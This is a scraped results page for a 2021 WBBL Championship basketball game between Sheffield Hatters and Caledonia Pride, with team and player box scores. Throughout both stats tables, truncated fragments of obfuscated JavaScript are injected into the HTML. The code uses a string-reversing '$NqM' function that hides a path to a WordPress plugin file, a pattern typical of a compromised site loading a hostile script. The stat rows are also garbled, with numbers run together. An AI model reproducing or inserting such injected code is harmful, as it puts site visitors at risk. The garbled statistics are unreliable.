Breaking news
  1. Highlights & Pictures
  2. Highlights: Queens v Pride
  3. Highlights & Pictures: Pride v Riders
  4. Highlights: Wolves v Pride
  5. Highlights & Pictures: Pride v Wolves
WBBL Championship 21st November 2021 - 2:00 pm

Details

Date Time League Season Full Time
21st November 2021 2:00 pm WBBL Championship 2021/22 40'

Results

Team1234T
Sheffield Hatters2117232586
Caledonia Pride1514201766

Sheffield Hatters

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
G. Gayle-26953171450.01520.0111384.6091
H. Shaw-22301191560.000044100.0211
A. Gill-1280204850.00004850.0350
N. Jamison-Myers-870004850.0000000070
R. Cardenas-831001333.311100.05683.3124
H. Naylor-44321090.0040.044100.0220
N. Fong Lyew Quee-435402450.0010.0000212
C. McGrath-212001616.7010.0000010
A. Whitehouse-01130030.0010.0000101
A. Nee-00000000000000001
E. Ioannou-00000000000000000
N. Campbell-00000000000000000
 Total 863917153287040.021315.4283580.01128010

Caledonia Pride

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
11Taylor EdwardsGuard16991041136.400081457.1366
5Sian PhillipsForward1543106966.7020.033100.0225
4Maud RangerGuard121012051926.32728.6020.0374
14Erin McGarrachanForward10400051145.5020.0000132
25Elise TweedieCenter891122633.31250.03475.0272
6Rose HarveyGuard301001333.31333.3000000
22Sophie LoughranForward211001250.0000000010
16Aoife LoftusForward00000000000000000
50Eabha KerrForward00000010.0010.0000001
8Taryn CumminsGuard03100020.0000000030
27Zoe SharpeGuard00000010.0000000001
 Total 66401752246536.941723.5142360.91129021